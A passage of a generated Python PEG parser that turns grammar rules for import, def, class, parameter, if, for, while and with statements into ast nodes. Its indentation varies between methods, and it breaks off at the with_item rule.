return ast . Raise ( exc = None , cause = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def global_stmt(self) -> Optional[ast . Global]:
# global_stmt: 'global' ','.NAME+
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('global'))
and
(a := self._gather_20())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Global ( names = [n . string for n in a] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def nonlocal_stmt(self) -> Optional[ast . Nonlocal]:
# nonlocal_stmt: 'nonlocal' ','.NAME+
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('nonlocal'))
and
(a := self._gather_22())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Nonlocal ( names = [n . string for n in a] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def del_stmt(self) -> Optional[ast . Delete]:
# del_stmt: 'del' del_targets &(';' | NEWLINE) | invalid_del_stmt
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('del'))
and
(a := self.del_targets())
and
self.positive_lookahead(self._tmp_24, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Delete ( targets = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(invalid_del_stmt := self.invalid_del_stmt())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def yield_stmt(self) -> Optional[ast . Expr]:
# yield_stmt: yield_expr
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(y := self.yield_expr())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Expr ( value = y , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def assert_stmt(self) -> Optional[ast . Assert]:
# assert_stmt: 'assert' expression [',' expression]
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('assert'))
and
(a := self.expression())
and
(b := self._tmp_25(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Assert ( test = a , msg = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def import_stmt(self) -> Optional[ast . Import]:
# import_stmt: import_name | import_from
mark = self._mark()
if (
(import_name := self.import_name())
):
return import_name
self._reset(mark)
if (
(import_from := self.import_from())
):
return import_from
self._reset(mark)
return None
@memoize
def import_name(self) -> Optional[ast . Import]:
# import_name: 'import' dotted_as_names
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('import'))
and
(a := self.dotted_as_names())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Import ( names = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
    @memoize
    def import_from(self) -> Optional[ast . ImportFrom]:
        """Grammar rule — import_from: 'from' dots* dotted_name 'import' targets | 'from' dots+ 'import' targets.

        The second (module-less, relative-only) form omits the ``module``
        keyword on 3.9+ and passes ``module=None`` explicitly on older
        interpreters.
        """
        # import_from: 'from' (('.' | '...'))* dotted_name 'import' import_from_targets | 'from' (('.' | '...'))+ 'import' import_from_targets
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (literal := self.expect('from'))
            and
            (a := self._loop0_26(),)
            and
            (b := self.dotted_name())
            and
            (literal_1 := self.expect('import'))
            and
            (c := self.import_from_targets())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . ImportFrom ( module = b , names = c , level = self . extract_import_level ( a ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('from'))
            and
            (a := self._loop1_27())
            and
            (literal_1 := self.expect('import'))
            and
            (b := self.import_from_targets())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . ImportFrom ( names = b , level = self . extract_import_level ( a ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . ImportFrom ( module = None , names = b , level = self . extract_import_level ( a ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
@memoize
def import_from_targets(self) -> Optional[List [ast . alias]]:
# import_from_targets: '(' import_from_as_names ','? ')' | import_from_as_names !',' | '*' | invalid_import_from_targets
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('('))
and
(a := self.import_from_as_names())
and
(opt := self.expect(','),)
and
(literal_1 := self.expect(')'))
):
return a
self._reset(mark)
if (
(import_from_as_names := self.import_from_as_names())
and
self.negative_lookahead(self.expect, ',')
):
return import_from_as_names
self._reset(mark)
if (
(literal := self.expect('*'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return [ast . alias ( name = "*" , asname = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )]
self._reset(mark)
if (
(invalid_import_from_targets := self.invalid_import_from_targets())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def import_from_as_names(self) -> Optional[List [ast . alias]]:
# import_from_as_names: ','.import_from_as_name+
mark = self._mark()
if (
(a := self._gather_28())
):
return a
self._reset(mark)
return None
@memoize
def import_from_as_name(self) -> Optional[ast . alias]:
# import_from_as_name: NAME ['as' NAME]
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.name())
and
(b := self._tmp_30(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . alias ( name = a . string , asname = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def dotted_as_names(self) -> Optional[List [ast . alias]]:
# dotted_as_names: ','.dotted_as_name+
mark = self._mark()
if (
(a := self._gather_31())
):
return a
self._reset(mark)
return None
@memoize
def dotted_as_name(self) -> Optional[ast . alias]:
# dotted_as_name: dotted_name ['as' NAME]
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.dotted_name())
and
(b := self._tmp_33(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . alias ( name = a , asname = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize_left_rec
def dotted_name(self) -> Optional[str]:
# dotted_name: dotted_name '.' NAME | NAME
mark = self._mark()
if (
(a := self.dotted_name())
and
(literal := self.expect('.'))
and
(b := self.name())
):
return a + "." + b . string
self._reset(mark)
if (
(a := self.name())
):
return a . string
self._reset(mark)
return None
@memoize
def block(self) -> Optional[list]:
# block: NEWLINE INDENT statements DEDENT | simple_stmts | invalid_block
mark = self._mark()
if (
(_newline := self.expect('NEWLINE'))
and
(_indent := self.expect('INDENT'))
and
(a := self.statements())
and
(_dedent := self.expect('DEDENT'))
):
return a
self._reset(mark)
if (
(simple_stmts := self.simple_stmts())
):
return simple_stmts
self._reset(mark)
if (
(invalid_block := self.invalid_block())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def decorators(self) -> Optional[Any]:
# decorators: decorator+
mark = self._mark()
if (
(_loop1_34 := self._loop1_34())
):
return _loop1_34
self._reset(mark)
return None
@memoize
def decorator(self) -> Optional[Any]:
# decorator: ('@' dec_maybe_call NEWLINE) | ('@' named_expression NEWLINE)
mark = self._mark()
if (
(a := self._tmp_35())
):
return a
self._reset(mark)
if (
(a := self._tmp_36())
):
return self . check_version ( ( 3 , 9 ) , "Generic decorator are" , a )
self._reset(mark)
return None
@memoize
def dec_maybe_call(self) -> Optional[Any]:
# dec_maybe_call: dec_primary '(' arguments? ')' | dec_primary
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(dn := self.dec_primary())
and
(literal := self.expect('('))
and
(z := self.arguments(),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Call ( func = dn , args = z [0] if z else [] , keywords = z [1] if z else [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(dec_primary := self.dec_primary())
):
return dec_primary
self._reset(mark)
return None
@memoize_left_rec
def dec_primary(self) -> Optional[Any]:
# dec_primary: dec_primary '.' NAME | NAME
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.dec_primary())
and
(literal := self.expect('.'))
and
(b := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Attribute ( value = a , attr = b . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Name ( id = a . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def class_def(self) -> Optional[ast . ClassDef]:
# class_def: decorators class_def_raw | class_def_raw
mark = self._mark()
if (
(a := self.decorators())
and
(b := self.class_def_raw())
):
return self . set_decorators ( b , a )
self._reset(mark)
if (
(class_def_raw := self.class_def_raw())
):
return class_def_raw
self._reset(mark)
return None
@memoize
def class_def_raw(self) -> Optional[ast . ClassDef]:
# class_def_raw: invalid_class_def_raw | 'class' NAME ['(' arguments? ')'] &&':' block
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_class_def_raw := self.invalid_class_def_raw())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('class'))
and
(a := self.name())
and
(b := self._tmp_37(),)
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(c := self.block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . ClassDef ( a . string , bases = b [0] if b else [] , keywords = b [1] if b else [] , body = c , decorator_list = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
return None
@memoize
def function_def(self) -> Optional[Union [ast . FunctionDef , ast . AsyncFunctionDef]]:
# function_def: decorators function_def_raw | function_def_raw
mark = self._mark()
if (
(d := self.decorators())
and
(f := self.function_def_raw())
):
return self . set_decorators ( f , d )
self._reset(mark)
if (
(f := self.function_def_raw())
):
return self . set_decorators ( f , [] )
self._reset(mark)
return None
    @memoize
    def function_def_raw(self) -> Optional[Union [ast . FunctionDef , ast . AsyncFunctionDef]]:
        """Grammar rule — function_def_raw: invalid | 'def' ... | 'async' 'def' ...

        The ':' after the signature is a forced token (hard error when
        missing); the async form is gated behind a 3.5+ version check.
        """
        # function_def_raw: invalid_def_raw | 'def' NAME '(' params? ')' ['->' expression] &&':' func_type_comment? block | 'async' 'def' NAME '(' params? ')' ['->' expression] &&':' func_type_comment? block
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_def_raw := self.invalid_def_raw())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (literal := self.expect('def'))
            and
            (n := self.name())
            and
            (literal_1 := self.expect('('))
            and
            (params := self.params(),)
            and
            (literal_2 := self.expect(')'))
            and
            (a := self._tmp_38(),)
            and
            (forced := self.expect_forced(self.expect(':'), "':'"))
            and
            (tc := self.func_type_comment(),)
            and
            (b := self.block())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . FunctionDef ( name = n . string , args = params or self . make_arguments ( None , [] , None , [] , None ) , returns = a , body = b , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
        self._reset(mark)
        if (
            (literal := self.expect('async'))
            and
            (literal_1 := self.expect('def'))
            and
            (n := self.name())
            and
            (literal_2 := self.expect('('))
            and
            (params := self.params(),)
            and
            (literal_3 := self.expect(')'))
            and
            (a := self._tmp_39(),)
            and
            (forced := self.expect_forced(self.expect(':'), "':'"))
            and
            (tc := self.func_type_comment(),)
            and
            (b := self.block())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . check_version ( ( 3 , 5 ) , "Async functions are" , ast . AsyncFunctionDef ( name = n . string , args = params or self . make_arguments ( None , [] , None , [] , None ) , returns = a , body = b , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , ) )
        self._reset(mark)
        return None
@memoize
def params(self) -> Optional[Any]:
# params: invalid_parameters | parameters
mark = self._mark()
if (
(invalid_parameters := self.invalid_parameters())
):
return None # pragma: no cover
self._reset(mark)
if (
(parameters := self.parameters())
):
return parameters
self._reset(mark)
return None
    @memoize
    def parameters(self) -> Optional[ast . arguments]:
        # parameters: slash_no_default param_no_default* param_with_default* star_etc? | slash_with_default param_with_default* star_etc? | param_no_default+ param_with_default* star_etc? | param_with_default+ star_etc? | star_etc
        """Parse a full parameter list into an ``ast.arguments`` node.

        The five alternatives cover every legal combination of
        positional-only ('/'), plain, defaulted, and star sections.
        """
        mark = self._mark()
        if (
            (a := self.slash_no_default())
            and
            (b := self._loop0_40(),)
            and
            (c := self._loop0_41(),)
            and
            (d := self.star_etc(),)
        ):
            # '/' requires Python 3.8+ positional-only parameter support.
            return self . check_version ( ( 3 , 8 ) , "Positional only arguments are" , self . make_arguments ( a , [] , b , c , d ) )
        self._reset(mark)
        if (
            (a := self.slash_with_default())
            and
            (b := self._loop0_42(),)
            and
            (c := self.star_etc(),)
        ):
            return self . check_version ( ( 3 , 8 ) , "Positional only arguments are" , self . make_arguments ( None , a , None , b , c ) , )
        self._reset(mark)
        if (
            (a := self._loop1_43())
            and
            (b := self._loop0_44(),)
            and
            (c := self.star_etc(),)
        ):
            return self . make_arguments ( None , [] , a , b , c )
        self._reset(mark)
        if (
            (a := self._loop1_45())
            and
            (b := self.star_etc(),)
        ):
            return self . make_arguments ( None , [] , None , a , b )
        self._reset(mark)
        if (
            (a := self.star_etc())
        ):
            return self . make_arguments ( None , [] , None , None , a )
        self._reset(mark)
        return None
    @memoize
    def slash_no_default(self) -> Optional[List [Tuple [ast . arg , None]]]:
        # slash_no_default: param_no_default+ '/' ',' | param_no_default+ '/' &')'
        """Parse positional-only params without defaults, ending at '/'.

        Returns (arg, None) pairs; the None marks "no default value".
        """
        mark = self._mark()
        if (
            (a := self._loop1_46())
            and
            (literal := self.expect('/'))
            and
            (literal_1 := self.expect(','))
        ):
            return [( p , None ) for p in a]
        self._reset(mark)
        if (
            (a := self._loop1_47())
            and
            (literal := self.expect('/'))
            and
            # lookahead only: ')' is matched by the caller, not consumed here
            self.positive_lookahead(self.expect, ')')
        ):
            return [( p , None ) for p in a]
        self._reset(mark)
        return None
    @memoize
    def slash_with_default(self) -> Optional[List [Tuple [ast . arg , Any]]]:
        # slash_with_default: param_no_default* param_with_default+ '/' ',' | param_no_default* param_with_default+ '/' &')'
        """Parse positional-only params where at least one has a default.

        Returns (arg, default-or-None) pairs for everything before '/'.
        """
        mark = self._mark()
        if (
            (a := self._loop0_48(),)
            and
            (b := self._loop1_49())
            and
            (literal := self.expect('/'))
            and
            (literal_1 := self.expect(','))
        ):
            return ( [( p , None ) for p in a] if a else [] ) + b
        self._reset(mark)
        if (
            (a := self._loop0_50(),)
            and
            (b := self._loop1_51())
            and
            (literal := self.expect('/'))
            and
            self.positive_lookahead(self.expect, ')')
        ):
            return ( [( p , None ) for p in a] if a else [] ) + b
        self._reset(mark)
        return None
    @memoize
    def star_etc(self) -> Optional[Tuple [Optional [ast . arg] , List [Tuple [ast . arg , Any]] , Optional [ast . arg]]]:
        # star_etc: '*' param_no_default param_maybe_default* kwds? | '*' ',' param_maybe_default+ kwds? | kwds | invalid_star_etc
        """Parse the star section of a parameter list.

        Returns a (vararg, keyword-only params, kwarg) triple; vararg is
        None for the bare '*' (keyword-only marker) form.
        """
        mark = self._mark()
        if (
            (literal := self.expect('*'))
            and
            (a := self.param_no_default())
            and
            (b := self._loop0_52(),)
            and
            (c := self.kwds(),)
        ):
            return ( a , b , c )
        self._reset(mark)
        if (
            (literal := self.expect('*'))
            and
            (literal_1 := self.expect(','))
            and
            (b := self._loop1_53())
            and
            (c := self.kwds(),)
        ):
            return ( None , b , c )
        self._reset(mark)
        if (
            (a := self.kwds())
        ):
            return ( None , [] , a )
        self._reset(mark)
        if (
            (invalid_star_etc := self.invalid_star_etc())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
@memoize
def kwds(self) -> Optional[Any]:
# kwds: '**' param_no_default
mark = self._mark()
if (
(literal := self.expect('**'))
and
(a := self.param_no_default())
):
return a
self._reset(mark)
return None
    @memoize
    def param_no_default(self) -> Optional[ast . arg]:
        # param_no_default: param ',' TYPE_COMMENT? | param TYPE_COMMENT? &')'
        """Parse a single parameter without a default value.

        Accepts a trailing ',' or a lookahead ')' (last parameter).
        """
        mark = self._mark()
        if (
            (a := self.param())
            and
            (literal := self.expect(','))
            and
            (tc := self.type_comment(),)
        ):
            return self . set_arg_type_comment ( a , tc )
        self._reset(mark)
        if (
            (a := self.param())
            and
            (tc := self.type_comment(),)
            and
            self.positive_lookahead(self.expect, ')')
        ):
            return self . set_arg_type_comment ( a , tc )
        self._reset(mark)
        return None
    @memoize
    def param_with_default(self) -> Optional[Tuple [ast . arg , Any]]:
        # param_with_default: param default ',' TYPE_COMMENT? | param default TYPE_COMMENT? &')'
        """Parse a parameter with a mandatory '=default'.

        Returns an (arg, default-expression) pair.
        """
        mark = self._mark()
        if (
            (a := self.param())
            and
            (c := self.default())
            and
            (literal := self.expect(','))
            and
            (tc := self.type_comment(),)
        ):
            return ( self . set_arg_type_comment ( a , tc ) , c )
        self._reset(mark)
        if (
            (a := self.param())
            and
            (c := self.default())
            and
            (tc := self.type_comment(),)
            and
            self.positive_lookahead(self.expect, ')')
        ):
            return ( self . set_arg_type_comment ( a , tc ) , c )
        self._reset(mark)
        return None
    @memoize
    def param_maybe_default(self) -> Optional[Tuple [ast . arg , Any]]:
        # param_maybe_default: param default? ',' TYPE_COMMENT? | param default? TYPE_COMMENT? &')'
        """Parse a parameter whose '=default' is optional.

        Returns (arg, default-or-None); used after '*' where defaults
        may be omitted.
        """
        mark = self._mark()
        if (
            (a := self.param())
            and
            (c := self.default(),)
            and
            (literal := self.expect(','))
            and
            (tc := self.type_comment(),)
        ):
            return ( self . set_arg_type_comment ( a , tc ) , c )
        self._reset(mark)
        if (
            (a := self.param())
            and
            (c := self.default(),)
            and
            (tc := self.type_comment(),)
            and
            self.positive_lookahead(self.expect, ')')
        ):
            return ( self . set_arg_type_comment ( a , tc ) , c )
        self._reset(mark)
        return None
    @memoize
    def param(self) -> Optional[Any]:
        # param: NAME annotation?
        """Parse a bare parameter name plus optional ':' annotation
        into an ``ast.arg`` carrying source locations."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.name())
            and
            (b := self.annotation(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . arg ( arg = a . string , annotation = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
@memoize
def annotation(self) -> Optional[Any]:
# annotation: ':' expression
mark = self._mark()
if (
(literal := self.expect(':'))
and
(a := self.expression())
):
return a
self._reset(mark)
return None
@memoize
def default(self) -> Optional[Any]:
# default: '=' expression
mark = self._mark()
if (
(literal := self.expect('='))
and
(a := self.expression())
):
return a
self._reset(mark)
return None
    @memoize
    def if_stmt(self) -> Optional[ast . If]:
        # if_stmt: invalid_if_stmt | 'if' named_expression ':' block elif_stmt | 'if' named_expression ':' block else_block?
        """Parse an if statement; elif chains become nested ast.If nodes
        in ``orelse``."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_if_stmt := self.invalid_if_stmt())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (literal := self.expect('if'))
            and
            (a := self.named_expression())
            and
            (literal_1 := self.expect(':'))
            and
            (b := self.block())
            and
            (c := self.elif_stmt())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . If ( test = a , body = b , orelse = c or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('if'))
            and
            (a := self.named_expression())
            and
            (literal_1 := self.expect(':'))
            and
            (b := self.block())
            and
            (c := self.else_block(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . If ( test = a , body = b , orelse = c or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def elif_stmt(self) -> Optional[List [ast . If]]:
        # elif_stmt: invalid_elif_stmt | 'elif' named_expression ':' block elif_stmt | 'elif' named_expression ':' block else_block?
        """Parse an elif clause (recursively) as a one-element list of
        ast.If, so it can be used directly as the parent's ``orelse``."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_elif_stmt := self.invalid_elif_stmt())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (literal := self.expect('elif'))
            and
            (a := self.named_expression())
            and
            (literal_1 := self.expect(':'))
            and
            (b := self.block())
            and
            (c := self.elif_stmt())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return [ast . If ( test = a , body = b , orelse = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )]
        self._reset(mark)
        if (
            (literal := self.expect('elif'))
            and
            (a := self.named_expression())
            and
            (literal_1 := self.expect(':'))
            and
            (b := self.block())
            and
            (c := self.else_block(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return [ast . If ( test = a , body = b , orelse = c or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )]
        self._reset(mark)
        return None
@memoize
def else_block(self) -> Optional[list]:
# else_block: invalid_else_stmt | 'else' &&':' block
mark = self._mark()
if (
(invalid_else_stmt := self.invalid_else_stmt())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('else'))
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(b := self.block())
):
return b
self._reset(mark)
return None
    @memoize
    def while_stmt(self) -> Optional[ast . While]:
        # while_stmt: invalid_while_stmt | 'while' named_expression ':' block else_block?
        """Parse a while loop, with an optional else block."""
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_while_stmt := self.invalid_while_stmt())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (literal := self.expect('while'))
            and
            (a := self.named_expression())
            and
            (literal_1 := self.expect(':'))
            and
            (b := self.block())
            and
            (c := self.else_block(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . While ( test = a , body = b , orelse = c or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        return None
    @memoize
    def for_stmt(self) -> Optional[Union [ast . For , ast . AsyncFor]]:
        # for_stmt: invalid_for_stmt | 'for' star_targets 'in' ~ star_expressions &&':' TYPE_COMMENT? block else_block? | 'async' 'for' star_targets 'in' ~ star_expressions ':' TYPE_COMMENT? block else_block? | invalid_for_target
        """Parse a (possibly async) for loop.

        The ``cut`` flag implements the grammar's '~' operator: once 'in'
        is consumed, failure commits -- no further alternatives are tried.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_for_stmt := self.invalid_for_stmt())
        ):
            return None # pragma: no cover
        self._reset(mark)
        cut = False
        if (
            (literal := self.expect('for'))
            and
            (t := self.star_targets())
            and
            (literal_1 := self.expect('in'))
            and
            (cut := True)
            and
            (ex := self.star_expressions())
            and
            (forced := self.expect_forced(self.expect(':'), "':'"))
            and
            (tc := self.type_comment(),)
            and
            (b := self.block())
            and
            (el := self.else_block(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . For ( target = t , iter = ex , body = b , orelse = el or [] , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if cut: return None
        cut = False
        if (
            (literal := self.expect('async'))
            and
            (literal_1 := self.expect('for'))
            and
            (t := self.star_targets())
            and
            (literal_2 := self.expect('in'))
            and
            (cut := True)
            and
            (ex := self.star_expressions())
            and
            (literal_3 := self.expect(':'))
            and
            (tc := self.type_comment(),)
            and
            (b := self.block())
            and
            (el := self.else_block(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . check_version ( ( 3 , 5 ) , "Async for loops are" , ast . AsyncFor ( target = t , iter = ex , body = b , orelse = el or [] , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
        self._reset(mark)
        if cut: return None
        if (
            (invalid_for_target := self.invalid_for_target())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def with_stmt(self) -> Optional[Union [ast . With , ast . AsyncWith]]:
        # with_stmt: invalid_with_stmt_indent | 'with' '(' ','.with_item+ ','? ')' ':' block | 'with' ','.with_item+ ':' TYPE_COMMENT? block | 'async' 'with' '(' ','.with_item+ ','? ')' ':' block | 'async' 'with' ','.with_item+ ':' TYPE_COMMENT? block | invalid_with_stmt
        """Parse a (possibly async) with statement.

        Parenthesized item lists are tried before unparenthesized ones;
        parenthesized multi-item form requires Python 3.9+.
        """
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (invalid_with_stmt_indent := self.invalid_with_stmt_indent())
        ):
            return None # pragma: no cover
        self._reset(mark)
        if (
            (literal := self.expect('with'))
            and
            (literal_1 := self.expect('('))
            and
            (a := self._gather_54())
            and
            (opt := self.expect(','),)
            and
            (literal_2 := self.expect(')'))
            and
            (literal_3 := self.expect(':'))
            and
            (b := self.block())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . check_version ( ( 3 , 9 ) , "Parenthesized with items" , ast . With ( items = a , body = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
        self._reset(mark)
        if (
            (literal := self.expect('with'))
            and
            (a := self._gather_56())
            and
            (literal_1 := self.expect(':'))
            and
            (tc := self.type_comment(),)
            and
            (b := self.block())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . With ( items = a , body = b , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('async'))
            and
            (literal_1 := self.expect('with'))
            and
            (literal_2 := self.expect('('))
            and
            (a := self._gather_58())
            and
            (opt := self.expect(','),)
            and
            (literal_3 := self.expect(')'))
            and
            (literal_4 := self.expect(':'))
            and
            (b := self.block())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . check_version ( ( 3 , 9 ) , "Parenthesized with items" , ast . AsyncWith ( items = a , body = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
        self._reset(mark)
        if (
            (literal := self.expect('async'))
            and
            (literal_1 := self.expect('with'))
            and
            (a := self._gather_60())
            and
            (literal_2 := self.expect(':'))
            and
            (tc := self.type_comment(),)
            and
            (b := self.block())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . check_version ( ( 3 , 5 ) , "Async with statements are" , ast . AsyncWith ( items = a , body = b , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
        self._reset(mark)
        if (
            (invalid_with_stmt := self.invalid_with_stmt())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
    @memoize
    def with_item(self) -> Optional[ast . withitem]:
